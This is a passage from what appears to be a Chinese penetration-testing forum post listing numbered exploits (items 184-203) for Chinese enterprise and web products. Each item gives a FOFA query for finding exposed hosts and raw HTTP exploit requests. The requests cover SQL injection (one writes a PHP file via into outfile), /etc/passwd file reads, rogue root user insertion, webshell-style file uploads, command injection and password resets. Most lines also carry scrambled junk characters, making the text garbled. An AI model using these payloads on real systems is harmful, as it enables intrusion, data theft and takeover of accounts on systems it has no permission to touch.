6 z+ g( ^* n/ TUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
/ |3 p% i# H( k2 H. O# CAccept-Charset: utf-8& }4 `9 q: h7 P' {! U  ^8 @# B
Accept-Encoding: gzip, deflate6 }& k. y- ^! \  Q6 m! @" V
Connection: close
* B! e# u0 B) X9 a, q% R7 }6 p, B2 l) o7 x, `% A$ H
0 V! u1 F: T1 T; T  ]+ R
184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加7 L$ ^" {8 N: T* M; l- i* |
FOFA:server="SunFull-Webs"
1 b! `0 d# H' Q4 I. sPOST /soap/AddUser HTTP/1.1
: ]+ \8 d- O/ M: Y9 k8 d- mHost: your-ip. C& \, a/ g- k8 }. b* K
Accept-Encoding: gzip, deflate
) \8 G% J0 R2 i  j. X% s/ NUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
6 m( z. J/ X+ S3 [6 vAccept: application/xml, text/xml, */*; q=0.01
" Z2 |6 V- n- [# r+ ~# f  k% DContent-Type: text/xml; charset=utf-8) _) m) a/ d* o# r- b4 _
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
( i, ?& Y. A# n5 NX-Requested-With: XMLHttpRequest
& J( g0 p) e& i5 @; u9 t
' u, I' y  Z: L. q9 x
) A  Q9 y" w" L7 ~/ ~* sinsert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')
; N5 V0 {3 c/ k1 G! E2 P
2 s5 L3 Q" Y9 e& y1 X. B& Y. z" C! H, {  j2 Y# L# W% }
185. 瑞友天翼应用虚拟化系统SQL注入, k' O: {: ^7 ]* Y8 G' K$ S: ^
version < 7.0.5.1) C6 u- ^% c8 k+ ?7 @
FOFA:app="REALOR-天翼应用虚拟化系统"! F3 |9 v& ?- B/ R/ m( @
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
7 S" @& y! w3 m! h$ _3 |. {6 _Host: host0 M  e0 }' m' E9 p* p2 T( X- X, x- W' D
3 I8 n% W  z6 x/ _% {2 e: `

! E8 I0 q2 l7 |& h( `; B186. F-logic DataCube3 SQL注入
' f( p  T- G+ d. SCVE-2024-31750
* g9 q  q- ]- b4 k8 Z  oF-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统
' I( R- |$ w8 R( _9 kFOFA:title=="DataCube3"
  _4 ^8 Y/ V( C' T- e4 uPOST /admin/pr_monitor/getting_index_data.php HTTP/1.1
# z1 Q2 L; r9 c$ qHost: your-ip
8 E4 w4 p4 C/ p% Z1 q9 ^User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.09 |& c8 V/ J1 p6 [$ b
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
: ]* R4 L! Q# Q6 l- N) D' oAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
% ]3 B- V& m; d9 mAccept-Encoding: gzip, deflate
2 Y7 |8 M2 S+ G: i! p$ J6 |, XConnection: close; ?6 v! v5 V+ r% _2 T
Content-Type: application/x-www-form-urlencoded
9 p* R4 L9 N+ }$ K9 O
% T! L) @5 G. W% J( r2 x* ~6 wreq_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450/ G, i& W2 ^) X" p4 G

2 D( d4 F5 m6 h) j+ D' {0 i4 \( ^" u4 @9 _
187. Mura CMS processAsyncObject SQL注入" J4 ]8 `* f$ h
CVE-2024-326402 k# g* F- c) N- d$ G
FOFA:"Mura CMS"" m% @# g  @2 C( y5 l
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1( k1 F: |1 U# e. f! k! ]9 d* ]% w; I
Host: your-ip+ i6 l) A" m7 e' N  G: h
Content-Type: application/x-www-form-urlencoded
: d* t6 f# t) m7 Z' o$ a2 z
( L8 {/ @& K2 f( B: C4 t2 k$ Q
' D- V# h0 U" J  Hobject=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=11 b- I' s, P/ H. \7 `" Z6 {

- c) A! q5 b- O
0 A4 l$ G8 V" }188. 叁体-佳会视频会议 attachment 任意文件读取* x# J/ X& D9 [  Q  i
version <= 3.9.7
( V0 l% U: o0 _3 Q, `FOFA:body="/system/get_rtc_user_defined_info?site_id"3 g  `! P! @3 E9 ~0 U+ @% B- I
GET /attachment?file=/etc/passwd HTTP/1.1# V. o& A, `# s0 R' \/ F- w( ?
Host: your-ip
+ k* a3 l  A4 d- t: j. RUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36- V* x0 l! T# ?- q8 d$ o
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7% I+ T/ k& u3 G; X8 f& ?  u
Accept-Encoding: gzip, deflate2 l- u4 G1 R( a
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
7 [- C4 N$ c+ gConnection: close
* ~( R$ B2 n) S  @6 i
* b9 T% N! L& ^4 |+ E& u$ f2 s0 v8 A- d, }: q
189. 蓝网科技临床浏览系统 deleteStudy SQL注入
. d% m0 F# _* [2 \5 XFOFA:app="LANWON-临床浏览系统". {; _  L  J4 G4 u0 N, v
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1$ [% Y4 Z) S2 f7 t( M
Host: your-ip. a4 K; I9 t- f4 c
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36! h! ?( V( d* q/ O& u) H; S. d4 m
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7+ q: `6 p+ Q: d! b/ W- d. f
Accept-Encoding: gzip, deflate% c/ r+ o! C8 c1 S
Accept-Language: zh-CN,zh;q=0.9: `5 c, ~* |# R! j
Connection: close1 ~$ P! h! `0 ^7 Z3 P. ]" n, A7 L

1 S) U8 J# F( l1 w2 l# S% W' Y4 @8 Q; A6 p+ I% A
190. 短视频矩阵营销系统 poihuoqu 任意文件读取* i% l" X1 x1 h! I, v
FOFA:title=="短视频矩阵营销系统"5 v/ N) d5 T7 {+ T6 Z# x
POST /index.php/admin/Userinfo/poihuoqu HTTP/2- k1 T1 h/ i. u" ?
Host: your-ip
- Z& N' j4 j3 w4 x9 E$ cUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36% `- C+ j$ `6 E% ]& I# ^: A0 M
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.96 Y& N0 Q4 l/ y
Content-Type: application/x-www-form-urlencoded+ J4 g' S" b9 n. |$ W  j
Accept-Encoding: gzip, deflate
" x/ F  L4 e. [) M7 c) OAccept-Language: zh-CN,zh;q=0.9
) p; m% T0 x' O/ `( K1 s: G8 O- ^
3 E4 O8 h, W  K4 q0 _6 p+ r  Upoi=file:///etc/passwd) z- ~. K' K& F% \* k/ G9 z: a

' _! ~. n1 o) Y7 U7 W0 D8 y( s6 C: k& `2 y) J
191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入* j6 N6 b2 b' b$ [; p
FOFA:body="/CDGServer3/index.jsp"
" S% I' B- c* [0 _& NPOST /CDGServer3/js/../NavigationAjax HTTP/1.1$ G! j- p2 ?( {7 {
Host: your-ip
! M8 P$ A" c! K& v1 |4 BUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.360 u$ R; o  D/ O8 L* o! {( y: j
Content-Type: application/x-www-form-urlencoded) v! O2 k* Y, K* A: ^. f
( O$ Y. e) w  s; c
command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=, `" N6 W. x2 h$ P! y" p. `. F

) g# O- T* {" l0 B1 n5 x7 J3 k& v, h+ z/ e6 x8 h
192. 富通天下外贸ERP UploadEmailAttr 任意文件上传8 d- _/ |- F  K5 W9 x$ b
FOFA:title="用户登录_富通天下外贸ERP"7 O3 _+ F- I- X2 k
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.13 _" C7 k- K6 w. U' N8 z
Host: your-ip
  T5 J- A6 }  u7 E! b" aUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
1 F4 k9 u: Q' o( p9 A) qContent-Type: application/x-www-form-urlencoded! L- x/ {: O; s
% c0 y, U/ ^% G2 G( b* R  t! @1 [9 O3 ^
# n; I2 l0 L$ d+ M
<% @ webhandler language="C#" class="AverageHandler" %>
( t) C* f9 z$ \2 M# ]& m+ Susing System;
- b: W" w1 I2 \; husing System.Web;
/ E) ~- R9 i& n' h( Y2 Dpublic class AverageHandler : IHttpHandler
  w7 m9 `9 [8 {- V{
2 V5 M3 X% g8 f: {1 m; L+ H* Xpublic bool IsReusable9 N. S+ c. N6 y2 F/ l+ k
{ get { return true; } }5 \/ F) S0 x. f7 ?( U" c9 Z# R) l
public void ProcessRequest(HttpContext ctx)) e, q0 {3 \4 t2 ]* E
{% H) l* F  @7 j4 }
ctx.Response.Write("test");
& q8 S$ N, ?6 I& _# [+ @}3 K, W- C' W7 f) J+ N  Q% Y
}
3 N1 x0 `. p1 z! u( B. V0 X& W( T9 V0 x9 e

1 R$ j' x/ i' }6 O) W3 r0 ^- W193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行2 g( ^/ v& B; V) L; g8 B0 @
FOFA:body="山石云鉴主机安全管理系统"7 [. F: S! p% H3 Y0 Z0 R9 o& M
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
4 o- X% I/ A+ [& |# I1 L1 Q1 N! eHost:  R, k, M/ ?# o$ Z# ]. V! U/ z
Cookie: PHPSESSID=2333333333333;
3 T8 p7 L9 N; n: k% _Content-Type: application/x-www-form-urlencoded
4 y- Z8 m8 M% b9 \User-Agent: Mozilla/5.0
* u3 p# H/ S  h, P6 N* U/ ?- |( j+ v1 E# t) t- @6 A

7 `: X6 [5 U  y% I; bPOST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
5 g, w' j* e/ K" `% M, f7 gHost:
$ c9 U. q4 Y$ Z' z5 H4 _User-Agent: Mozilla/5.0
, h* b3 ?; m: C, h0 RAccept-Encoding: gzip, deflate3 i1 }8 n( X2 }$ K0 O
Accept: */*
0 W4 @8 d; C0 d0 OConnection: close
- F  E# V0 t0 R( |( uCookie: PHPSESSID=2333333333333;
8 I9 e, u9 a- A6 f0 @+ n/ J0 F: MContent-Type: application/x-www-form-urlencoded
$ v7 J/ Q7 a4 f, ]/ d6 ]$ DContent-Length: 848 D& c& T  g. D/ d) P6 z5 g

% ~' S2 C, k9 V# zparam=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')$ a* ~7 A: T( O1 S

. ~$ }. x; U! o9 O9 x$ J; Q. F, t# p" O6 z- B
GET /master/img/config HTTP/1.1
7 ], l/ S) g3 p, ^6 Y: H1 nHost:- a2 b+ N5 L8 h$ m( T% p! p
User-Agent: Mozilla/5.05 I" l9 A1 l4 A) l( F& X

3 E2 \! W8 m: I' l( ^0 N( }3 r5 K4 @6 c$ j8 Q' R* i
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传' G7 U" ?# m# Q4 U; U4 Z4 Q# M
FOFA:app="FE-协作平台"访问 /servlet/uploadAttachmentServlet 有返回则漏洞存在
1 A! c1 w3 m& ]$ o
5 s0 ?6 p  `0 n( X8 |; jPOST /servlet/uploadAttachmentServlet HTTP/1.1
% ~7 q9 k9 `$ s5 V0 d% O, \3 W$ yHost: host
% Z* p+ O+ v! t$ kUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
$ M" n& b+ [. ]) q) J; XAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
8 y4 l0 ^6 l3 o0 S1 ?4 s8 ?+ IAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2! Y* R& U* [& X2 @" x* L
Accept-Encoding: gzip, deflate8 }% A. k/ d& C8 o* `+ ?8 ]" z, c- K
Connection: close6 O# f, ?. s; V" A
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk
: P5 j; C7 d4 S9 M5 Z------WebKitFormBoundaryKNt0t4vBe8cX9rZk
# O' h/ |5 d: @' X- s# i  q! |, w9 {7 P
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"& G8 J& }) c+ V: }8 E" q6 |
Content-Type: text/plain
$ A  ~4 ^! J- ^4 f<% out.println("hello");%>
! ^/ C8 b" W0 |  Z% }1 K------WebKitFormBoundaryKNt0t4vBe8cX9rZk; h$ _' A4 F# j1 p! x
Content-Disposition: form-data; name="json"4 y; }- q' O& m5 j+ Z$ J- H5 B4 y
{"iq":{"query":{"UpdateType":"mail"}}}4 Q  A: L7 a/ R2 y3 L! q
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--, t3 r: f6 r3 z9 A  g
) U- |9 [5 j3 v% s6 B4 T
2 \# N0 X( ]  m9 _
195. 飞鱼星上网行为管理系统 send_order.cgi命令执行; _0 M% v8 M+ P9 |7 e: ~
FOFA:title=="飞鱼星企业级智能上网行为管理系统- ]2 [  w, w; Q4 }- I& F" B
POST /send_order.cgi?parameter=operation HTTP/1.1
1 ^$ y+ z+ w: h) D2 `4 THost: 127.0.0.1
8 t- n) A9 r# Q! P; xPragma: no-cache
! a% f5 p* I3 L+ `+ P: W& gCache-Control: no-cache! P0 P+ Y- o2 Z, X0 J" {0 f5 e0 P
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
# m: P1 \6 ^3 ~0 a/ |3 SAccept: */*) g7 \: P! T2 |1 N/ p0 K( o
Accept-Encoding: gzip, deflate9 P- o# P. R, G- U4 A8 a! Z$ N
Accept-Language: zh-CN,zh;q=0.9
, `! V9 o1 Q7 ~Connection: close
' ], I1 d2 @6 C6 H9 n6 m- ^3 ?$ PContent-Type: application/x-www-form-urlencoded! t, N* s+ V" \8 s# |. ]1 O- U
Content-Length: 68
9 t8 _6 D. k3 f+ {0 C) G
* _1 W* Z3 d$ Z- ~, P2 r{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}; L" y' f: Q; Z  y4 |* B
0 ]  }( O1 x+ ^, W$ r. j# ?

* m4 ]* K8 N% ?! L& j8 U+ u, a* @196. 河南省风速科技统一认证平台密码重置
& W$ }0 G3 }$ p5 B! iFOFA:body="/cas/themes/zbvc/js/jquery.min.js") J* n+ m8 _3 _, v( L( P
POST /cas/userCtl/resetPasswordBySuper HTTP/1.10 q$ ?! S8 ^' j1 j# O; f( b
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.365 L) ~9 d. r- r+ |! \
Content-Type: application/json;charset=UTF-8
$ z0 @4 [; ~  G/ o0 {X-Requested-With: XMLHttpRequest
6 D& j( L- v( X  ~Host:
0 O7 \& ]) a& R* Y  yAccept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
- d. ]; J3 Q3 KContent-Length: 45
" k0 l# E$ ^4 w0 U, tConnection: close
; ]9 h" r, N/ S) D: B/ z7 E$ e* z  x) j, q$ b0 ^) R
{"xgh":"test","newPass":"test666","email":""}
6 f$ r" j. z- v, d7 d. I& z4 b( F9 D* {: S! Y& @
% f( W. R/ @$ \+ t0 s9 P1 _

9 ^9 g$ H" s( J, `197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入
5 o! a+ @/ W; Q  O; ?6 b7 aFOFA:app="浙大恩特客户资源管理系统"5 L9 c( ]6 I/ F! ?1 i9 D/ s
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1$ \5 c+ c- ]& ?  a" o* i" g( {% y
Host:
5 N; n, S5 k# B! X( Z, p% vUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36* |2 E* A5 f: ~- a1 M: ]9 T
Accept-Encoding: gzip, deflate
3 k% I0 |: q* U3 w, W2 TConnection: close$ o) c5 F3 n, x, R/ B2 S
/ ]" N5 A( S9 n8 b' z' @" V
  i8 G- T1 A; L- }0 b2 p

9 w6 r8 z/ {" o+ b' r" O198.  阿里云盘 WebDAV 命令注入/ R& e' o7 t( v9 u3 {$ z6 R
CVE-2024-29640( Z- p6 u4 y. N0 w, ]8 B7 _
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
4 ?& ~: }9 ?& W: A1 ~1 e7 KCookie: sysauth=41273cb2cffef0bb5d0653592624cf64
/ j% B. \7 g  R! c  jAccept: */*
! U8 `( U! u( o% K2 O) |4 C4 y2 pAccept-Encoding: gzip, deflate: G1 s/ \3 i. c2 ~
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6: q1 b$ t2 }8 e/ a/ p; D$ q- R
Connection: close
" r% P1 U9 S# v4 ^  h0 G) Q: l" ~/ c! Y; W; g
' }7 \" X3 r2 M7 W& r6 i+ F: R
199. cockpit系统assetsmanager_upload接口 文件上传4 X) _3 t3 m  w2 l- o

+ Y/ @6 \! K) R) k: G4 }& M1.执行poc进行csrf信息获取,并获取cookie,再上传访问得到结果:. T. [8 j8 ?3 F; j% f0 L) S
GET /auth/login?to=/ HTTP/1.1
. z# o$ r. @+ R' V9 ~) I8 p( t3 [0 D6 O, A0 I
响应:200,返回值:csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"
6 n/ c1 ], _8 ~; ~9 u) M0 }; w& {6 u+ @$ y  G
2.使用刚才上一步获取到的jwt获取cookie:
+ h! `, ~" q1 b! ]5 J5 }5 k& \
. y# G* P3 i! P  q* N8 g  _POST /auth/check HTTP/1.1
. Z7 m1 K7 z. z$ @9 |& _9 kContent-Type: application/json
/ `! h: |+ O2 B! D8 ^
; K/ c1 o- {6 c; K# m& x, d. ~& P{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}
0 \/ o$ q  r6 n+ p8 p. b4 f3 u) M4 m7 F+ R# @1 y
响应:200,返回值:
; s9 R) P1 M$ _9 s# C/ FSet-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/
$ T9 J2 f1 N, H$ `% yFofa:title="Authenticate Please!"
. i5 e4 O5 Z* v# [8 s7 \2 IPOST /assetsmanager/upload HTTP/1.1+ h" k3 n, q! s: r' }
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
# f5 L9 h; G; k; D0 UCookie: mysession=95524f01e238bf51bb60d77ede3bea92
' O/ u3 u7 ?; z* }
8 b$ y8 J6 \& o4 y-----------------------------36D28FBc36bd6feE7Fb3
; |5 Z4 L6 B6 N9 [+ y( uContent-Disposition: form-data; name="files[]"; filename="tttt.php"
- _' P) M, W0 M/ d. C, CContent-Type: text/php/ e5 D7 k1 u8 @/ c7 G* ~

% H3 i& P4 Y4 I5 [/ f<?php echo "tttt";unlink(__FILE__);?>
1 S8 }$ ^: C. A3 n( z1 B2 ^0 N2 b-----------------------------36D28FBc36bd6feE7Fb38 O+ e: ?$ n5 m7 t" R/ j
Content-Disposition: form-data; name="folder"
- c9 r7 i  {6 i4 [) M9 e, E% U. s8 \
* N9 J* c7 e; V8 w3 O, t-----------------------------36D28FBc36bd6feE7Fb3--7 T' ?- {/ k- P8 v

0 }/ V1 h/ @7 z. T5 T9 m* r
, S3 ?8 j* P* E; `/storage/uploads/tttt.php
' ]6 D9 x- [+ c6 X1 I5 Y$ p0 b' d: Q& K1 K
200. SeaCMS海洋影视管理系统dmku SQL注入
- c2 A4 @2 v, U3 [( z9 T3 YFOFA:app="海洋CMS"
* @$ s* k: [0 t( O3 \GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.11 }" t  r# w& O$ s/ Q
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s" _) @3 U( w9 y. i0 G3 T
Upgrade-Insecure-Requests: 1. X: z! D+ v  M( M  r4 X) u. J
Cache-Control: max-age=0' H3 K0 L3 D! U( q! `% s! j
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
( i2 F( J" p6 x8 b* Z0 D8 D  T' kAccept-Encoding: gzip, deflate) M/ ~4 }+ b) S( d- G& x8 i
Accept-Language: zh-CN,zh;q=0.96 `( u' N* B& i0 j& t8 Q

8 B* Z8 V6 I# q3 z" a+ e* O8 q5 [$ g* V3 M# \6 [) N8 l2 w" [: u
201. 方正全媒体新闻采编系统 binary SQL注入/ s: q# Y* j; S
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
1 y/ `4 Z! G3 \8 q$ gPOST /newsedit/newsplan/task/binary.do HTTP/1.1
0 ?# M+ Q# E! b) |8 \  bContent-Type: application/x-www-form-urlencoded
* v/ p/ r$ _2 A% Y' ]6 w" [Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
0 @7 t1 V! u7 f* ?+ p7 t+ AAccept-Encoding: gzip, deflate
  q4 n, }  Q. O9 X7 I% DAccept-Language: zh-CN,zh;q=0.9, h3 b% t: [) }# `
Connection: close
" G( y. V5 G, z  n7 ~4 W
. P; q6 R: f+ j  U0 nTableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1
& g0 x- n* r* S) `5 s% w& m& A# s' }- D. }
7 x+ k0 _0 j; S
202. 微擎系统 AccountEdit任意文件上传% F/ ?' S. m$ x% j- [
FOFA:body="/Widgets/WidgetCollection/"
, u" `1 Q( K* Y* F7 k* F$ C, W* |获取__VIEWSTATE和__EVENTVALIDATION值6 ~$ q. M4 L5 C: }* B
GET /User/AccountEdit.aspx HTTP/1.1. U$ x6 \% u6 X& {: w0 h+ v5 G; p
Host: 滑板人之家* ~1 }  T, I# V2 I& q, @6 y' F/ [
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31) X3 b* d# C) v% t! ?$ O9 t: m
Content-Length: 0, A, H1 I4 w* I

+ e% U) ?+ j3 b- q' J  b; u' m$ t( ]0 O+ |9 l( T
替换__VIEWSTATE和__EVENTVALIDATION值3 H- W% N! G9 U" V& e3 `
POST /User/AccountEdit.aspx HTTP/1.1
5 Z8 d  s. l& D5 dAccept-Encoding: gzip, deflate, br& j) v' R1 ^2 q9 ]! ^# \. h
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687
9 @3 ]( k; Y$ O
+ F% x6 M; A: a. P-----------------------------786435874t38587593865736587346567358735687
1 F5 k- n$ N5 ?Content-Disposition: form-data; name="__VIEWSTATE"
2 o/ s1 T' x, n$ j6 O0 L4 W! A/ J
5 H; U8 b, f( ___VIEWSTATE4 y* v+ B: z4 u" X  Q
-----------------------------786435874t38587593865736587346567358735687
+ ]8 [+ A  {3 J# N+ X' gContent-Disposition: form-data; name="__EVENTVALIDATION"
  S9 g! p/ r, A5 e
& g, _/ H2 k/ M7 H" a! g__EVENTVALIDATION% d  a6 k" u; M; {2 v# B1 ?# U' k0 ?
-----------------------------786435874t38587593865736587346567358735687! Z, P) F* w1 E- @; I
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"9 D8 ^! |6 T' o4 h9 ^) Y7 P
Content-Type: text/plain/ b: d7 ^  F4 e$ O

& y- t$ p( k, U- w7 f( {/ \Hello World!
% V6 v8 N  e& \  ?" N-----------------------------786435874t38587593865736587346567358735687
9 y# d2 p3 d4 D& f' b$ ?% FContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"
7 {) h! N* X+ O  h' T
: p" |, K4 C2 _- v. Q) |$ y! T上传图片: q) _# j$ F! O" u" e
-----------------------------786435874t38587593865736587346567358735687
+ z% `" V4 S9 r9 e$ xContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"
4 ]8 A/ m$ ]( J. m" y  f$ g& Y+ O; a2 {3 {

0 X" v1 z1 T& }-----------------------------786435874t38587593865736587346567358735687$ `4 d8 h* |( {% M  ~( e
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"8 [2 a" b9 F9 R
! w# A+ o8 v9 l; l# j

( E% U' k5 P, W& |# E6 \-----------------------------786435874t38587593865736587346567358735687--. @; z% Z# G8 |3 o+ j4 p# |

9 \  Z9 Q1 A( E) }/ C+ N; U
# V& y$ X2 P; ^) e6 v. P& L0 u/_data/Uploads/1123.txt
4 u8 c" I. `* w1 Z6 b0 u. K# k9 u9 K+ j7 u2 i7 r1 p
203. 红海云EHR PtFjk 文件上传) B; S  e* ]2 N/ ?. f( o
FOFA:body="RedseaPlatform", w% ]' _7 {+ T7 w/ g* j' }
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
1 ]+ K4 S; w5 o, }Host: x.x.x.x
( y4 V% E" b; A- Q$ E  OAccept-Encoding: gzip
8 h! P" z7 I7 ?! w5 IUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
7 u4 S! J1 x  C4 O- M% c' PContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys40 a* y: v3 n( Q
Content-Length: 210! [7 k* ~) v/ N8 v4 T+ n! H# E
) G# {; v/ p! S: v) R! d& m' n$ b
------WebKitFormBoundaryt7WbDl1tXogoZys4* W; A8 g) q! D' [; X/ Y' o
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"& b! c  g! ]) l; G$ b/ Z. R: a; Z# R
Content-Type:image/jpeg
" K" }' _% N/ }& h$ V3 |! `" s
9 D- ^1 _3 ]0 Z& f<% out.print("hello,eHR");%>
4 H. Y2 c" I2 c3 o. j4 `. u1 s5 q------WebKitFormBoundaryt7WbDl1tXogoZys4--6 O. n- W5 Q+ f7 E+ [0 A0 S
# A4 c) S  k5 [: U

) v' X/ }) t0 z5 T$ i/ J$ n( v* x" B2 Z8 ?9 W

4 X1 m0 {2 t) n% E; b
2 c4 l/ F4 {  m" M; X. G+ o* l3 i2 l8 F6 B0 A/ @% {8 o



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2